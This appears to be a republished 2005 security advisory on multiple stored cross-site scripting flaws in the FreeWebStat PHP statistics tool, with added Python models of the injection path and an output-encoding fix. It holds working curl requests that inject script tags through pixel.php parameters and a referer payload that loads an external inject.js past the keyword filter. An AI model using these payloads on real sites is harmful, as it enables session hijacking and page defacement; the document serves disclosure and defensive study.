FreeWebStat Multiple Cross Site Scripting
FreeWebStat is a web statistics and counter application used to track website traffic. The "Multiple Cross-Site Scripting" (XSS) vulnerability refers to a series of security flaws discovered within this application.

These vulnerabilities arose because FreeWebStat failed to validate or HTML-encode user-supplied input before writing it back into the statistics pages it generates. Attackers could inject malicious client-side scripts (e.g., JavaScript) through these unsanitized inputs.

When other users viewed pages containing this injected code, their browsers would execute the script. This allowed attackers to:
* Steal session cookies, potentially leading to session hijacking.
* Deface web pages or inject malicious content.
* Redirect users to malicious sites.
* Perform actions on behalf of the victim user.

The "multiple" aspect indicates that these XSS flaws were present in several different parts or functionalities of the FreeWebStat application, making it broadly susceptible to such attacks.

FreeWebStat Multiple XSS Vulnerabilities

Name Multiple XSS Vulnerabilities in FreeWebStat
Systems Affected FreeWebStat (verified on 1.0 rev37)
Severity Medium Risk
Vendor www.freewebstat.com
Advisory http://www_ush_it/2005/11/25/free-web-stat/
Author Francesco "aScii" Ongaro (ascii at katamail . com)
Date 20051125

I. BACKGROUND

FreeWebStat is a PHP stats program, more information is
available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the latest version at the time of writing)
is vulnerable to multiple XSS. The impact is a bit bigger than usual
since the data is stored to a file and the result of a single
query persists for some time on the backend. A well-timed
loop of requests will make the XSS permanent.

We issued an advisory for another application by the same
author, "Php Web Statistik Multiple Vulnerabilities", and the
author replied that a "new version with all fixed bugs can be found
under www.freewebstat.com". Well, we downloaded this version
and found the same type of vulnerabilities.

The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

These vulnerabilities can be exploited with a plain GET request.

1) logdb.html XSS

logdb.html is vulnerable to JS injection; the little filtering
there is can be bypassed with anti-escape methods (e.g. single
quotes are stripped, but there are plenty of working workarounds
for this).

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)</script>&jsref=<script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www_ush_it"

$site, $jsref, $jsres and $jscolor are vulnerable.

Loading a URL into $jsref will give you a full link (if the logdb.html
page has any PageRank you can drain some of it).

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : )

The order with the example query is 2 3 2 3 4 5.

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=<script>alert(123)&jsref=1024x768&jsres=1337&jscolor=red" \
  -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" \
  -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" \
  -e "http://www.suma.it/" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)&jsref=</script><script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www_ush_it"
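The following is an added example, not code from FreeWebStat or from the advisory author. It is a small Python model of the pipeline section 1 describes: pixel.php stores the GET parameters in a log, stats.php reads the log back and writes logdb.html, and whatever was logged lands in the page. The log line layout (pipe-separated, one hit per line) and the HTML skeleton are assumptions, since the page does not show them; what the model keeps from the advisory is that single quotes are stripped, that site, jsref, jsres and jscolor reach the page, that site and jsref are printed twice (the 2 3 2 3 4 5 alert order), and that domain is not printed. The escape=True path is the htmlspecialchars()-style output encoding that fixes it.

```python
import html
import re

# Added example (not FreeWebStat code): Python model of the
# pixel.php -> log file -> stats.php -> logdb.html flow of section 1.
# Assumed: log line layout and HTML skeleton (not given on the page).

PIXEL_PARAMS = ("domain", "site", "jsref", "jsres", "jscolor")

def strip_single_quotes(value):
    """The only filtering the advisory mentions: single quotes are dropped.
    A payload that needs no quotes, such as <script>alert(1)</script>, passes."""
    return value.replace("'", "")

def log_hit(params):
    """pixel.php stand-in: one logged hit (hypothetical pipe-separated layout)."""
    return "|".join(strip_single_quotes(params.get(p, "")) for p in PIXEL_PARAMS) + "\n"

def parse_log(log_text):
    """stats.php stand-in, read side: one dict per logged hit."""
    return [dict(zip(PIXEL_PARAMS, line.split("|")))
            for line in log_text.splitlines() if line]

def render_logdb(entries, escape):
    """stats.php stand-in, write side: rebuild logdb.html from the log.
    escape=False inserts the logged strings raw (the vulnerable behaviour);
    escape=True passes each one through an htmlspecialchars() equivalent."""
    enc = html.escape if escape else (lambda s: s)
    out = ["<html><body>"]
    for e in entries:
        out.append("<h1>Stats for %s</h1>" % enc(e["site"]))          # site, 1st time
        out.append("<p>Last referer: %s</p>" % enc(e["jsref"]))        # jsref, 1st time
        out.append("<table><tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr></table>"
                   % (enc(e["site"]), enc(e["jsref"]), enc(e["jsres"]), enc(e["jscolor"])))
    out.append("</body></html>")
    return "\n".join(out)

ALERT_TAG = re.compile(r"<script>alert\((\d+)\)</script>")

def alert_order(page):
    """The alert(n) calls a browser would execute, in page order."""
    return [int(n) for n in ALERT_TAG.findall(page)]

def demo():
    """Replay the section 1.1 request against the model: one hit carrying
    alert(1)..alert(5) in domain, site, jsref, jsres and jscolor."""
    hit = {p: "<script>alert(%d)</script>" % i for i, p in enumerate(PIXEL_PARAMS, 1)}
    entries = parse_log(log_hit(hit))     # pixel.php wrote it, stats.php read it back
    vulnerable = alert_order(render_logdb(entries, escape=False))
    fixed = alert_order(render_logdb(entries, escape=True))
    return vulnerable, fixed

if __name__ == "__main__":
    print(demo())   # ([2, 3, 2, 3, 4, 5], [])
```

Note that the quote stripping never touches the payload: `<script>alert(2)</script>` contains no quote, which is the "anti-escape" point made above. Encoding at output time, not filtering at input time, is what empties the second list.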

2) stat.php search key XSS

2.1) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)

# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )
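Review bot: the added `echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";` prints the logged referer into the page without htmlspecialchars(), so the debug line is itself one more sink for the injected referer; keep it to a throwaway test copy of stat.php. The `if (TRUE)` replacement disables the in_array() check against $ip_archive entirely, which is what makes every repeated request from the same IP count as a new hit.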

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

Will display one "DEBUG sukasuka" line, under the header and above the
"summary", for every new query.

# save the referer except the own domain name.
if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=ssss&domain="

search words ( 1 ) lello splendor 100 % 1
search engines ( 1 ) Google 100 % 1

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=lello+splendor++&hl=it"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=<script>alert(123456789)</script>++&hl=it"

Now the injection is executed in 2 points, the referer table and the keyword
table.

2.2) Exploiting the search key XSS

stat.php gives us some tricks, and we are evil. The string is
lowercased and any + or - character becomes a (real, not %20) space.

$terms = str_replace( '\"', "", $terms ); # delete \"
$terms = strtolower( $terms ); # string to lower

$terms = str_replace( "+" , " ", $terms ); # replace + with space
$terms = str_replace( "-" , " ", $terms ); # replace - with space

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=ppoopp<script language="javascript"-src="http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it"

After stat.php's replacements the - between the two attributes becomes
a space, leaving a well-formed external script tag pointing at inject.js.
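The following is an added example, not code from FreeWebStat or from the advisory author. It models in Python the four stat.php lines quoted above and runs the section 2.2 payload through them, to show what the clean-up does and does not do to the keyword table. One assumption: the page does not show how stat.php pulls the search words out of the stored referer, so extract_q() is a plain regex on the raw q= value with no URL decoding. The referers are constructed: the benign Google search from section 1.4, the advisory's payload, and a variant whose script filename contains a dash.

```python
import re

# Added example (not FreeWebStat code): Python model of the stat.php keyword
# clean-up quoted in section 2.2. extract_q() is an assumption; the page does
# not show the extraction code, only the four filter lines.

def extract_q(referer):
    """Raw q= value from a Google-style referer (assumed extraction, no decoding)."""
    m = re.search(r"[?&]q=([^&]*)", referer)
    return m.group(1) if m else ""

def filter_terms(terms):
    """Line-for-line model of the stat.php snippet."""
    terms = terms.replace('\\"', "")   # str_replace( '\"', "", $terms ): drops the 2-char sequence \"
    terms = terms.lower()              # strtolower( $terms )
    terms = terms.replace("+", " ")    # str_replace( "+", " ", $terms )
    terms = terms.replace("-", " ")    # str_replace( "-", " ", $terms )
    return terms

def keyword_cell(referer):
    """The keyword-table cell stat.php would emit: filtered, never HTML-encoded."""
    return "<td>%s</td>" % filter_terms(extract_q(referer))

SCRIPT_SRC = re.compile(r'<script\s[^>]*\bsrc="([^"]*)"[^>]*>\s*</script>')

def injected_script_src(cell):
    """src of an external <script> that survived the filter, or None."""
    m = SCRIPT_SRC.search(cell)
    return m.group(1) if m else None

# Constructed referers (not captured traffic).
BENIGN = "http://www.google.it/search?q=lello+splendor++&hl=it"
PAYLOAD = ("http://www.google.it/search?q=ppoopp"
           '<script language="javascript"-src="http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it')
DASHED = ("http://www.google.it/search?q=ppoopp"
          '<script language="javascript"-src="http://local.asciistation.zapto.org/fws/inject-1.js"></script>&hl=it')

if __name__ == "__main__":
    print(keyword_cell(BENIGN))                     # <td>lello splendor  </td>
    print(keyword_cell(PAYLOAD))                    # the - has become the attribute separator
    print(injected_script_src(keyword_cell(DASHED)))  # dash in the filename is mangled too
```

Lowercasing is harmless to an all-lowercase tag, and the dash-to-space rule is what turns `"javascript"-src` into two attributes. The DASHED variant shows the one constraint the filter puts on the attacker: a dash anywhere in the payload, including the hosted filename, becomes a space as well. The real fix is the output encoding of section V, applied to the cell before it is written.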

IV. DETECTION

FreeWebStat 1.0 rev37 is vulnerable.
Older versions not verified.

V. WORKAROUND

Input validation, together with HTML-encoding every logged value
(htmlspecialchars() or equivalent) before it is written into the
generated pages, will fix the vulnerability.

VI. VENDOR RESPONSE

Vendor will fix and release a new version.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸